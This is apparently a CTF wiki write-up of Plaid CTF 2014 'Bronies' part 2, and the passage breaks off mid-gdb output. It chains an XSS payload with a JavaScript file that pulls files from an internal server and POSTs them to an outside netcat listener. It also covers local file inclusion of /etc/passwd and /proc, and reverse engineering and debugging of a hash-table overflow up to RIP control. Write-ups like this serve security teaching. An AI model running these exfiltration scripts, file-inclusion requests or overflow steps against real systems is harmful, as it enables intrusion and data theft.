Hexcellents CTF Wiki
Plaid CTF 2014: "Bronies" Part 2. 500 out of 800 pts
Task text for part 1:
We are trying to break into eXtreme Secure Solutions, where The Plague works as a system adminstrator. We have found that their internal company login page is at http://portal.essolutions.largestctf.com/. Recon has also revealed that The Plague likes to browse this site during work hours: http://54.196.225.30/ using the username ponyboy2004. Remember, our main target is to break into the company portal, *not* the pony site.
Task text for part 2:
This challenge has one more flag. Break into the internal server to capture it! Reminder: For security reasons, all internet traffic is blocked on the Bigson (http://bigson.essolutions.largestctf.com/index?file=index.html)
The difficulty of part 2 is that the Bigson cannot be accessed remotely so we need to do it via the previous XSS mechanism:
$ host-woods bigson.essolutions.largestctf.com bigson.essolutions.largestctf.com A 10.15.0.5
To get back information we will reuse what is on the otp site: AJAX. Let's do the exact query on the site and send the output to ourselves. We first need to get over the 127 character limitation in the argv[0] xss exploit. As the encoded payload we modify the following in create_xss_external.py:
#s = """<script>document.location="http://%s/logger.php?cookie="+document.cookie;</script>""" % YOUR_IP s = """<script\nsrc="http://swarm.cs.pub.ro/~rcaragea/part2.js"></script><!--"""
And this is part2.js:
- part2.js
function do_requests(geturl) { var response = ''; $.ajax({ type: "GET", url: geturl, async: false, success : function(data, textStatus, jqXHR) { response += "GET request response:\n" + jqXHR.responseText; }, error: function(jqXHR, textStatus, ex) { response += "GET request error response:\n" + textStatus + "\n" + ex + "\n" + jqXHR.responseText + jqXHR.getAllResponseHeaders() + jqXHR.statusCode(); } }); $.ajax({ type: "POST", url: "http://swarm.cs.pub.ro:42424", async: false, data: "Response so far: [" + response + "]", success : function(text) { } }); } function requests() { do_requests("http://bigson.essolutions.largestctf.com/index?file=index.html"); } var script = document.createElement("SCRIPT"); script.src = 'http://ajax.googleapis.com/ajax/libs/jquery/1.11.0/jquery.min.js'; script.type = 'text/javascript'; document.getElementsByTagName("head")[0].appendChild(script); script.onload = requests;
This is the output:
rcaragea@swarm:~$ nc -lvp 42424 listening on [any] 42424 ... connect to [141.85.227.118] from ec2-54-86-24-189.compute-1.amazonaws.com [54.86.24.189] 36980 POST / HTTP/1.1 Origin: http://portal.essolutions.largestctf.com User-Agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) PhantomJS/1.9.7 Safari/534.34 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept: */* Referer: http://portal.essolutions.largestctf.com/login.php Content-Length: 272 Connection: Keep-Alive Accept-Encoding: gzip Accept-Language: en-US,* Host: swarm.cs.pub.ro:42424 Response so far: [GET request response: <!doctype html> <html> <head> <title> The Bigson </title> </head> <body> <h1>The Bigson</h1> <p>Nobody can hack the Bigson!</p> <p>Note: The flag is not named anything obvious.</p> </body> </html>
Of course we try some file inclusions. Notice that the URL is “index?file=index.html”. What does index contain?
http://bigson.essolutions.largestctf.com/index?file=index Response so far: [GET request error response: error Not Found Not found.Content-Type: text/plain [object Object]]
There seems to be no index. What's more, the server does not issue a standard 404 response.
Response for [http://bigson.essolutions.largestctf.com/index?file=/etc/passwd] is: [GET request response: root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh sshd:x:101:65534::/var/run/sshd:/usr/sbin/nologin admin:x:1000:1000:Debian:/home/admin:/bin/bash bigson:x:1001:1001:,,,:/home/bigson:/bin/bash ]
Let's up the ante and see what exactly we're dealing with:
Response for [http://bigson.essolutions.largestctf.com/index?file=/proc/self/cmdline] is: [GET request response: ./bigson]
Response for [http://bigson.essolutions.largestctf.com/index?file=/proc/self/maps] is: [GET request response: 00400000-0040b000 r-xp 00000000 ca:00 137120 /home/bigson/bigson 0060b000-0060c000 rw-p 0000b000 ca:00 137120 /home/bigson/bigson 00c10000-00c31000 rw-p 00000000 00:00 0 [heap] 7f8b79db3000-7f8b79dbe000 r-xp 00000000 ca:00 131189 /lib/x86_64-linux-gnu/libnss_files-2.13.so 7f8b79dbe000-7f8b79fbd000 ---p 0000b000 ca:00 131189 /lib/x86_64-linux-gnu/libnss_files-2.13.so 7f8b79fbd000-7f8b79fbe000 r--p 0000a000 ca:00 131189 /lib/x86_64-linux-gnu/libnss_files-2.13.so 7f8b79fbe000-7f8b79fbf000 rw-p 0000b000 ca:00 131189 /lib/x86_64-linux-gnu/libnss_files-2.13.so 7f8b79fbf000-7f8b79fc9000 r-xp 00000000 ca:00 131185 /lib/x86_64-linux-gnu/libnss_nis-2.13.so 7f8b79fc9000-7f8b7a1c8000 ---p 0000a000 ca:00 131185 /lib/x86_64-linux-gnu/libnss_nis-2.13.so 7f8b7a1c8000-7f8b7a1c9000 r--p 00009000 ca:00 131185 /lib/x86_64-linux-gnu/libnss_nis-2.13.so 7f8b7a1c9000-7f8b7a1ca000 rw-p 0000a000 ca:00 131185 /lib/x86_64-linux-gnu/libnss_nis-2.13.so 7f8b7a1ca000-7f8b7a1df000 r-xp 00000000 ca:00 131183 /lib/x86_64-linux-gnu/libnsl-2.13.so 7f8b7a1df000-7f8b7a3de000 ---p 00015000 ca:00 131183 /lib/x86_64-linux-gnu/libnsl-2.13.so 7f8b7a3de000-7f8b7a3df000 r--p 00014000 ca:00 131183 /lib/x86_64-linux-gnu/libnsl-2.13.so 7f8b7a3df000-7f8b7a3e0000 rw-p 00015000 ca:00 131183 /lib/x86_64-linux-gnu/libnsl-2.13.so 7f8b7a3e0000-7f8b7a3e2000 rw-p 00000000 00:00 0 7f8b7a3e2000-7f8b7a3e9000 r-xp 00000000 ca:00 131178 /lib/x86_64-linux-gnu/libnss_compat-2.13.so 7f8b7a3e9000-7f8b7a5e8000 ---p 00007000 ca:00 131178 /lib/x86_64-linux-gnu/libnss_compat-2.13.so 7f8b7a5e8000-7f8b7a5e9000 r--p 00006000 ca:00 131178 /lib/x86_64-linux-gnu/libnss_compat-2.13.so 7f8b7a5e9000-7f8b7a5ea000 rw-p 00007000 ca:00 131178 /lib/x86_64-linux-gnu/libnss_compat-2.13.so 7f8b7a5ea000-7f8b7a76c000 r-xp 00000000 ca:00 131172 /lib/x86_64-linux-gnu/libc-2.13.so 7f8b7a76c000-7f8b7a96b000 ---p 00182000 ca:00 131172 /lib/x86_64-linux-gnu/libc-2.13.so 7f8b7a96b000-7f8b7a96f000 r--p 00181000 ca:00 131172 /lib/x86_64-linux-gnu/libc-2.13.so 7f8b7a96f000-7f8b7a970000 rw-p 00185000 ca:00 131172 /lib/x86_64-linux-gnu/libc-2.13.so 7f8b7a970000-7f8b7a975000 rw-p 00000000 00:00 0 7f8b7a975000-7f8b7a98a000 r-xp 00000000 ca:00 131614 /lib/x86_64-linux-gnu/libgcc_s.so.1 7f8b7a98a000-7f8b7ab8a000 ---p 00015000 ca:00 131614 /lib/x86_64-linux-gnu/libgcc_s.so.1 7f8b7ab8a000-7f8b7ab8b000 rw-p 00015000 ca:00 131614 /lib/x86_64-linux-gnu/libgcc_s.so.1 7f8b7ab8b000-7f8b7ac0c000 r-xp 00000000 ca:00 131180 /lib/x86_64-linux-gnu/libm-2.13.so 7f8b7ac0c000-7f8b7ae0b000 ---p 00081000 ca:00 131180 /lib/x86_64-linux-gnu/libm-2.13.so 7f8b7ae0b000-7f8b7ae0c000 r--p 00080000 ca:00 131180 /lib/x86_64-linux-gnu/libm-2.13.so 7f8b7ae0c000-7f8b7ae0d000 rw-p 00081000 ca:00 131180 /lib/x86_64-linux-gnu/libm-2.13.so 7f8b7ae0d000-7f8b7aef5000 r-xp 00000000 ca:00 5400 /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.17 7f8b7aef5000-7f8b7b0f5000 ---p 000e8000 ca:00 5400 /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.17 7f8b7b0f5000-7f8b7b0fd000 r--p 000e8000 ca:00 5400 /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.17 7f8b7b0fd000-7f8b7b0ff000 rw-p 000f0000 ca:00 5400 /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.17 7f8b7b0ff000-7f8b7b114000 rw-p 00000000 00:00 0 7f8b7b114000-7f8b7b134000 r-xp 00000000 ca:00 131650 /lib/x86_64-linux-gnu/ld-2.13.so 7f8b7b329000-7f8b7b32e000 rw-p 00000000 00:00 0 7f8b7b331000-7f8b7b333000 rw-p 00000000 00:00 0 7f8b7b333000-7f8b7b334000 r--p 0001f000 ca:00 131650 /lib/x86_64-linux-gnu/ld-2.13.so 7f8b7b334000-7f8b7b335000 rw-p 00020000 ca:00 131650 /lib/x86_64-linux-gnu/ld-2.13.so 7f8b7b335000-7f8b7b336000 rw-p 00000000 00:00 0 7fffbf2bb000-7fffbf2dc000 rw-p 00000000 00:00 0 [stack] 7fffbf3cf000-7fffbf3d0000 r-xp 00000000 00:00 0 [vdso] ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall] ]
A second request to /proc/self/maps reveals the same memory layout so at least we don't need to worry about ASLR. We now know the location of the binary, however doing a request on “/home/bigson/bigson” leaves us with a corrupt ELF file with lots of BFFD bytes. After searching on the web for a solution we find that the problem lies with the charset. Trying another charset such as charset=us-ascii solves the problem a bit more but not entirely. More googling leads us to https://developer.mozilla.org/en-US/docs/Web/API/XMLHttpRequest/Sending_and_Receiving_Binary_Data where we hit upon the correct charset to be used: charset=x-user-defined. Trying locally on a binary such as “/bin/ls” confirms this is a valid solution.
- part2.js
function do_requests(geturl) { var response = ''; $.ajax({ type: "GET", url: geturl, async: false, beforeSend : function (xhr) { xhr.overrideMimeType( "application/octet-stream; charset=x-user-defined" ); }, success : function(data, textStatus, jqXHR) { response += jqXHR.responseText; }, error: function(jqXHR, textStatus, ex) { response += "GET request error response:\n" + textStatus + "\n" + ex + "\n" + jqXHR.responseText + jqXHR.getAllResponseHeaders() + jqXHR.statusCode(); } }); var resp = "["; for ( var i = 0; i < response.length; i++ ) { resp += (response.charCodeAt(i) & 0xFF) + ","; } resp += "]"; $.ajax({ type: "POST", url: "http://swarm.cs.pub.ro:42424", async: false, data: "Response for ["+ geturl + "] is: [\n" + resp, success : function(text) { } }); } function requests() { do_requests("http://bigson.essolutions.largestctf.com/index?file=/home/bigson/bigson"); } var script = document.createElement("SCRIPT"); script.src = 'http://ajax.googleapis.com/ajax/libs/jquery/1.11.0/jquery.min.js'; script.type = 'text/javascript'; document.getElementsByTagName("head")[0].appendChild(script); script.onload = requests;
- listdec.py
#!/usr/bin/python import base64, urllib, sys f = open( sys.argv[1], "r") s = f.read() a = eval(s) print ''.join([chr(i) for i in a])
rcaragea@swarm:~$ nc -lvp 42424 > response listening on [any] 42424 ... connect to [141.85.227.118] from ec2-54-86-24-189.compute-1.amazonaws.com [54.86.24.189] 37112 rcaragea@swarm:~$ nano response rcaragea@swarm:~$ python ./listdec.py response > /tmp/bigson_test rcaragea@swarm:~$ file /tmp/bigson_test /tmp/bigson_test: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.26, BuildID[sha1]=79349a2a7b411808d739025c5d61c62fbfc9942e, not stripped rcaragea@swarm:~$ # /tmp/bigson_test bind: Address already in use
Of course this is a very crude and not so elegant solution but it seems to be working. We dump the other libraries in case we will need ROP gadgets and start analyzing the binary.
Binary Analysis
The initial analysis reveals the webserver is written in C++.
The first thing to do is to demangle the names using http://demangler.com/ or the settings in your favorite program.
The output is better now:
Some interesting class names now appear:
- HashTable
- HTTPRequest
- HTTPResponse
- Dispatcher
- HashEntry
- PHPHash
There is also an interesting assert call in the binary:
__assert_fail("hash_function_ != nullptr", "stage2.cc", 0xcd, "size_t HashTable::Hash(const string&) const");
Of course we should try to download stage2.cc from various directories but it doesn't appear to be on the filesystem.
By fuzzing the URL we get an interesting crash when a GET parameter is too big. Further analysis using a combination of IDA, Hopper and manual reversing leads us to the source of the crash:
function HashTable::Insert(std::string const&, std::string const&) { bucket_array = rdi; var_16 = rsi; var_8 = rdx; rax = HashTable::Lookup(bucket_array, var_16, var_16); hashentry = rax; if (hashentry == 0x0) { rax = operator new(0x18); rbx = rax; HashEntry::HashEntry(rbx, var_16); hashentry = rbx; hash_val = HashTable::Hash(bucket_array, var_16, var_16); hashentry->next = bucket_array[1 + hash_val]; //crashes here at 0x4032d4 ; new entry's next points to rest of chain (add to front) bucket_array[1 + hash_val] = hashentry; // ; bucket array points to new entry } rax = std::string::operator=(hashentry, var_8, var_8); return rax; }
It first looks up the parameter given in order to check if it was already inserted, if not it allocates a new HashEntry instance populates it and stores it at bucket_array[1 + hash(parameter)]. What is the hash function then? Let's check the constructor.
function HashTable::HashTable() { var_8 = rdi; *var_8 = 0x0; rsi = var_8 + 0x8; asm{ rep stosq }; rax = operator new(0x8, rsi, 0x101, 0x101); rbx = rax; PHPHash::PHPHash(rbx); rax = _ZNSt10unique_ptrI12HashFunctionSt14default_deleteIS0_EEC2EPS0_(var_8 + 0x810, rbx); return rax; }
Hmm, what does PHPHash do?
function PHPHash::operator()(char const*) { var_m24 = rdi; var_m32 = rsi; var_m8 = 0x0; rax = *(int8_t *)var_m32 & 0xff; TEST(rax & rax); asm{ setne al }; while (rax != 0x0) { var_m32 = var_m32 + 0x1; var_m8 = var_m8 + 0x1; } rax = var_m8; return rax; }
Hilarious! It's good old strlen. Here's a reference to the source of the name: https://news.ycombinator.com/item?id=6919216
Exploiting the vulnerability
So using the length of the parameter we can overwrite stuff in that memory zone. Let's see what we have there and what exactly gets written.
$ curl 127.0.0.1:81/index?TESTINGPARAM=TESTINGVALUE ... in another terminal: gdb-peda$ set follow-fork-mode child gdb-peda$ b *0x4032d4 Breakpoint 1 at 0x4032d4 gdb-peda$ run [New process 25704] [Switching to process 25704] [----------------------------------registers-----------------------------------] RAX: 0x7fffffffd350 --> 0x0 RBX: 0x60fb40 --> 0x7ffff7dda3f8 --> 0x0 RCX: 0x7ffff75b85c0 --> 0x0 RDX: 0xc ('\x0c') RSI: 0x60fad8 ("TESTINGPARAM") RDI: 0x60f740 --> 0x407c50 --> 0x403126 (<_ZN7PHPHashD2Ev>: push rbp) RBP: 0x7fffffffd1c0 --> 0x7fffffffd240 --> 0x7fffffffd280 --> 0x7fffffffdbb0 --> 0x7fffffffdbd0 --> 0x7fffffffdc20 --> 0x0 RSP: 0x7fffffffd180 --> 0x7fffffffd240 --> 0x7fffffffd280 --> 0x7fffffffdbb0 --> 0x7fffffffdbd0 --> 0x7fffffffdc20 --> 0x0 RIP: 0x4032d4 (<_ZN9HashTable6InsertERKSsS1_+116>: mov rdx,QWORD PTR [rax+rdx*8+0x8]) R8 : 0x0 R9 : 0x0 R10: 0x7fffffffcf00 --> 0x0 R11: 0x7ffff7b907d0 (<_ZNKSs5c_strEv>: mov rax,QWORD PTR [rdi]) R12: 0x401ff0 (<_start>: xor ebp,ebp) R13: 0x7fffffffdd00 --> 0x1 R14: 0x0 R15: 0x0 EFLAGS: 0x206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x4032c8 <_ZN9HashTable6InsertERKSsS1_+104>: mov QWORD PTR [rbp-0x20],rax 0x4032cc <_ZN9HashTable6InsertERKSsS1_+108>: mov rax,QWORD PTR [rbp-0x28] 0x4032d0 <_ZN9HashTable6InsertERKSsS1_+112>: mov rdx,QWORD PTR [rbp-0x20] => 0x4032d4 <_ZN9HashTable6InsertERKSsS1_+116>: mov rdx,QWORD PTR [rax+rdx*8+0x8] 0x4032d9 <_ZN9HashTable6InsertERKSsS1_+121>: mov rax,QWORD PTR [rbp-0x18] 0x4032dd <_ZN9HashTable6InsertERKSsS1_+125>: mov QWORD PTR [rax+0x10],rdx 0x4032e1 <_ZN9HashTable6InsertERKSsS1_+129>: mov rax,QWORD PTR [rbp-0x28] 0x4032e5 <_ZN9HashTable6InsertERKSsS1_+133>: mov rdx,QWORD PTR [rbp-0x20] [------------------------------------stack-------------------------------------] 0000| 0x7fffffffd180 --> 0x7fffffffd240 --> 0x7fffffffd280 --> 0x7fffffffdbb0 --> 0x7fffffffdbd0 --> 0x7fffffffdc20 --> 0x0 0008| 0x7fffffffd188 --> 0x7fffffffd1e0 --> 0x60fb18 ("TESTINGVALUE") 0016| 0x7fffffffd190 --> 0x7fffffffd1f0 --> 0x60fad8 ("TESTINGPARAM") 0024| 0x7fffffffd198 --> 0x7fffffffd350 --> 0x0 0032| 0x7fffffffd1a0 --> 0xc ('\x0c') 0040| 0x7fffffffd1a8 --> 0x60fb40 --> 0x7ffff7dda3f8 --> 0x0 0048| 0x7fffffffd1b0 --> 0x0 0056| 0x7fffffffd1b8 --> 0x401ff0 (<_start>: xor ebp,ebp) [------------------------------------------------------------------------------] Legend: code, data, rodata, value Breakpoint 1, 0x00000000004032d4 in HashTable::Insert(std::string const&, std::string const&) () gdb-peda$ telescope $rax 300 0000| 0x7fffffffd350 --> 0x0 0008| 0x7fffffffd358 --> 0x0 0016| 0x7fffffffd360 --> 0x0 0024| 0x7fffffffd368 --> 0x0 0032| 0x7fffffffd370 --> 0x0 0040| 0x7fffffffd378 --> 0x0 0048| 0x7fffffffd380 --> 0x0 0056| 0x7fffffffd388 --> 0x0 0064| 0x7fffffffd390 --> 0x0 0072| 0x7fffffffd398 --> 0x0 0080| 0x7fffffffd3a0 --> 0x0 0088| 0x7fffffffd3a8 --> 0x0 0096| 0x7fffffffd3b0 --> 0x0 0104| 0x7fffffffd3b8 --> 0x0 0112| 0x7fffffffd3c0 --> 0x0 0120| 0x7fffffffd3c8 --> 0x0 0128| 0x7fffffffd3d0 --> 0x0 0136| 0x7fffffffd3d8 --> 0x0 0144| 0x7fffffffd3e0 --> 0x0 ......................................................... 2000| 0x7fffffffdb20 --> 0x0 2008| 0x7fffffffdb28 --> 0x0 2016| 0x7fffffffdb30 --> 0x0 2024| 0x7fffffffdb38 --> 0x0 2032| 0x7fffffffdb40 --> 0x0 2040| 0x7fffffffdb48 --> 0x0 2048| 0x7fffffffdb50 --> 0x0 2056| 0x7fffffffdb58 --> 0x0 2064| 0x7fffffffdb60 --> 0x60f740 --> 0x407c50 --> 0x403126 (<_ZN7PHPHashD2Ev>: push rbp) 2072| 0x7fffffffdb68 --> 0x7ffff72d1d83 (<setgid+19>: cmp rax,0xfffffffffffff000) 2080| 0x7fffffffdb70 --> 0xffffffffffffff88 2088| 0x7fffffffdb78 --> 0x0 2096| 0x7fffffffdb80 --> 0x3eb 2104| 0x7fffffffdb88 --> 0x3 2112| 0x7fffffffdb90 --> 0x0 2120| 0x7fffffffdb98 --> 0x0 2128| 0x7fffffffdba0 --> 0x18 2136| 0x7fffffffdba8 --> 0x0 2144| 0x7fffffffdbb0 --> 0x7fffffffdbd0 --> 0x7fffffffdc20 --> 0x0 2152| 0x7fffffffdbb8 --> 0x402d12 (<_Z6handlei+26>: leave) 2160| 0x7fffffffdbc0 --> 0x7ffff7fb4740 (0x00007ffff7fb4740) 2168| 0x7fffffffdbc8 --> 0xaf75baec0 2176| 0x7fffffffdbd0 --> 0x7fffffffdc20 --> 0x0 2184| 0x7fffffffdbd8 --> 0x402f1e (<main+522>: mov eax,DWORD PTR [rbp-0x8])
The push rbp instruction seems interesting as that's the beginning of function prologues. Demangling the name gives us: “PHPHash::~PHPHash()”. Maybe we can overwrite it somehow.
We first check what gets written by our initial query by doing some more steps and dumping the memory:
gdb-peda$ telescope 0x7fffffffd350 20 0000| 0x7fffffffd350 --> 0x1 0008| 0x7fffffffd358 --> 0x0 0016| 0x7fffffffd360 --> 0x0 0024| 0x7fffffffd368 --> 0x0 0032| 0x7fffffffd370 --> 0x0 0040| 0x7fffffffd378 --> 0x0 0048| 0x7fffffffd380 --> 0x0 0056| 0x7fffffffd388 --> 0x0 0064| 0x7fffffffd390 --> 0x0 0072| 0x7fffffffd398 --> 0x0 0080| 0x7fffffffd3a0 --> 0x0 0088| 0x7fffffffd3a8 --> 0x0 0096| 0x7fffffffd3b0 --> 0x0 0104| 0x7fffffffd3b8 --> 0x60fb40 --> 0x60fb18 ("TESTINGVALUE")
Thus we have
0104| 0x7fffffffd3b8 --> 0x60fb40 --> 0x60fb18 ("TESTINGVALUE")
versus
2064| 0x7fffffffdb60 --> 0x60f740 --> 0x407c50 --> 0x403126 (<_ZN7PHPHashD2Ev>: push rbp)
The indirection levels seem to be equal. Let's try and force a segmentation fault at 44434241 using ABCD.
First we find out where the call is made from by setting a breakpoint on 0x403126. The location is
0x00000000004034ce <+120>: call r12
$ curl 127.0.0.1:81/index?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa=ABCD $ dmesg | tail -1 [Apr19 20:01] bigson_fork_nol[26239]: segfault at 1 ip 0000000000000001 sp 00007fffffffcf88 error 14 in bigson_fork_nolocal[400000+b000]
It doesn't seem to be working. We set a breakpoint right before r12 is set.
gdb-peda$ [----------------------------------registers-----------------------------------] RAX: 0x60fd78 --> 0x6161610044434241 ('ABCD') RBX: 0x60fbd0 --> 0x60fd78 --> 0x6161610044434241 ('ABCD') RCX: 0x60fc08 --> 0x61616100656c6966 ('file') RDX: 0x7fffffffd250 --> 0x60fc08 --> 0x61616100656c6966 ('file') RSI: 0x0 RDI: 0x7fffffffdb60 --> 0x60fbd0 --> 0x60fd78 --> 0x6161610044434241 ('ABCD') RBP: 0x7fffffffcfb0 --> 0x7fffffffcfe0 --> 0x7fffffffd280 --> 0x7fffffffdbb0 --> 0x7fffffffdbd0 --> 0x7fffffffdc20 --> 0x0 RSP: 0x7fffffffcf90 --> 0x7fffffffd250 --> 0x60fc08 --> 0x61616100656c6966 ('file') RIP: 0x4034b5 (<_ZNK9HashTable4HashERKSs+95>: add rax,0x18) R8 : 0x2710 R9 : 0x0 R10: 0x7ffff75b8618 --> 0x610290 --> 0x0 R11: 0x7ffff7386cf0 --> 0xfffc4e30fffc4670 R12: 0x401ff0 (<_start>: xor ebp,ebp) R13: 0x7fffffffdd00 --> 0x1 R14: 0x0 R15: 0x0 EFLAGS: 0x206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x4034aa <_ZNK9HashTable4HashERKSs+84>: call 0x404610 <_ZNKSt10unique_ptrI12HashFunctionSt14default_deleteIS0_EEdeEv> 0x4034af <_ZNK9HashTable4HashERKSs+89>: mov rbx,rax 0x4034b2 <_ZNK9HashTable4HashERKSs+92>: mov rax,QWORD PTR [rbx] => 0x4034b5 <_ZNK9HashTable4HashERKSs+95>: add rax,0x18 0x4034b9 <_ZNK9HashTable4HashERKSs+99>: mov r12,QWORD PTR [rax] 0x4034bc <_ZNK9HashTable4HashERKSs+102>: mov rax,QWORD PTR [rbp-0x20] 0x4034c0 <_ZNK9HashTable4HashERKSs+106>: mov rdi,rax 0x4034c3 <_ZNK9HashTable4HashERKSs+109>: call 0x401bb0 <_ZNKSs5c_strEv@plt> [------------------------------------stack-------------------------------------] 0000| 0x7fffffffcf90 --> 0x7fffffffd250 --> 0x60fc08 --> 0x61616100656c6966 ('file') 0008| 0x7fffffffcf98 --> 0x7fffffffd350 --> 0x1 0016| 0x7fffffffcfa0 --> 0x0 0024| 0x7fffffffcfa8 --> 0x401ff0 (<_start>: xor ebp,ebp) 0032| 0x7fffffffcfb0 --> 0x7fffffffcfe0 --> 0x7fffffffd280 --> 0x7fffffffdbb0 --> 0x7fffffffdbd0 --> 0x7fffffffdc20 --> 0x0 0040| 0x7fffffffcfb8 --> 0x40336e (<_ZNK9HashTable6LookupERKSs+54>: mov QWORD PTR [rbp-0x10],rax) 0048| 0x7fffffffcfc0 --> 0x7fffffffd250 --> 0x60fc08 --> 0x61616100656c6966 ('file') 0056| 0x7fffffffcfc8 --> 0x7fffffffd350 --> 0x1 [------------------------------------------------------------------------------] Legend: code, data, rodata, value 0x00000000004034b5 in HashTable::Hash(std::string const&) const () gdb-peda$ hexdump $rax /4 0x0060fd78 : 41 42 43 44 00 61 61 61 00 00 00 00 00 00 00 00 ABCD.aaa........ 0x0060fd88 : 41 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 A............... 0x0060fd98 : b8 d2 ff ff ff 7f 00 00 00 00 00 00 00 00 00 00 ................ 0x0060fda8 : 00 00 00 00 00 00 00 00 48 fd 60 00 00 00 00 00 ........H.`.....
Okay. The value needs to be longer. We do a standard pattern create+send+search to figure it out effortlessly:
gdb-peda$ pattc 0x32 'AAAaAA0AABAAbAA1AACAAcAA2AADAAdAA3AAEAAeAA4AAFAAfA' ............ $ curl 127.0.0.1:81/index?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa=AAAaAA0AABAAbAA1AACAAcAA2AADAAdAA3AAEAAeAA4AAFAAfA ..................... gdb-peda$ Stopped reason: SIGSEGV 0x00000000004034ce in HashTable::Hash(std::string const&) const () gdb-peda$ patts r12 Registers contain pattern buffer: R12+0 found at offset: 24
As expected, the dereferencing is done at 0x18 = 24. We now control RIP.
Finding a useful gadget
Since the binary has NX enabled we can't insert a shellcode and jump to it. We need to do a ROP attack using only one gadget. For this we also need to find out what we have on the stack and in the registers.
gdb-peda$ checksec CANARY : disabled FORTIFY : disabled NX : ENABLED PIE : disabled RELRO : disabled Program received signal SIGSEGV, Segmentation fault. [Switching to process 26521] [----------------------------------registers-----------------------------------] RAX: 0x60fc38 --> 0x61616100656c6966 ('file') RBX: 0x60fc00 --> 0x60fe28 ("AAAaAA0AABAAbAA1AACAAcAAABCD") RCX: 0x60fc38 --> 0x61616100656c6966 ('file') RDX: 0x7fffffffd250 --> 0x60fc38 --> 0x61616100656c6966 ('file') RSI: 0x60fc38 --> 0x61616100656c6966 ('file') RDI: 0x60fc00 --> 0x60fe28 ("AAAaAA0AABAAbAA1AACAAcAAABCD") RBP: 0x7fffffffcfb0 --> 0x7fffffffcfe0 --> 0x7fffffffd280 --> 0x7fffffffdbb0 --> 0x7fffffffdbd0 --> 0x7fffffffdc20 --> 0x0 RSP: 0x7fffffffcf90 --> 0x7fffffffd250 --> 0x60fc38 --> 0x61616100656c6966 ('file') RIP: 0x4034ce (<_ZNK9HashTable4HashERKSs+120>: call r12) R8 : 0x2710 R9 : 0x0 R10: 0x7ffff75b8618 --> 0x6102d0 --> 0x0 R11: 0x7ffff7386cf0 --> 0xfffc4e30fffc4670 R12: 0x6161610044434241 ('ABCD') R13: 0x7fffffffdd00 --> 0x1 R14: 0x0 R15: 0x0 EFLAGS: 0x10212 (carry parity ADJUST zero sign trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x4034c3 <_ZNK9HashTable4HashERKSs+109>: call 0x401bb0 <_ZNKSs5c_strEv@plt> 0x4034c8 <_ZNK9HashTable4HashERKSs+114>: mov rsi,rax 0x4034cb <_ZNK9HashTable4HashERKSs+117>: mov rdi,rbx => 0x4034ce <_ZNK9HashTable4HashERKSs+120>: call r12 0x4034d1 <_ZNK9HashTable4HashERKSs+123>: add rsp,0x10 0x4034d5 <_ZNK9HashTable4HashERKSs+127>: pop rbx 0x4034d6 <_ZNK9HashTable4HashERKSs+128>: pop r12 0x4034d8 <_ZNK9HashTable4HashERKSs+130>: pop rbp Guessed arguments: arg[0]: 0x60fc00 --> 0x60fe28 ("AAAaAA0AABAAbAA1AACAAcAAABCD") arg[1]: 0x60fc38 --> 0x61616100656c6966 ('file') [------------------------------------stack-------------------------------------] 0000| 0x7fffffffcf90 --> 0x7fffffffd250 --> 0x60fc38 --> 0x61616100656c6966 ('file') 0008| 0x7fffffffcf98 --> 0x7fffffffd350 --> 0x1 0016| 0x7fffffffcfa0 --> 0x0 0024| 0x7fffffffcfa8 --> 0x401ff0 (<_start>: xor ebp,ebp) 0032| 0x7fffffffcfb0 --> 0x7fffffffcfe0 --> 0x7fffffffd280 --> 0x7fffffffdbb0 --> 0x7fffffffdbd0 --> 0x7fffffffdc20 --> 0x0 0040| 0x7fffffffcfb8 --> 0x40336e (<_ZNK9HashTable6LookupERKSs+54>: mov QWORD PTR [rbp-0x10],rax) 0048| 0x7fffffffcfc0 --> 0x7fffffffd250 --> 0x60fc38 --> 0x61616100656c6966 ('file') 0056| 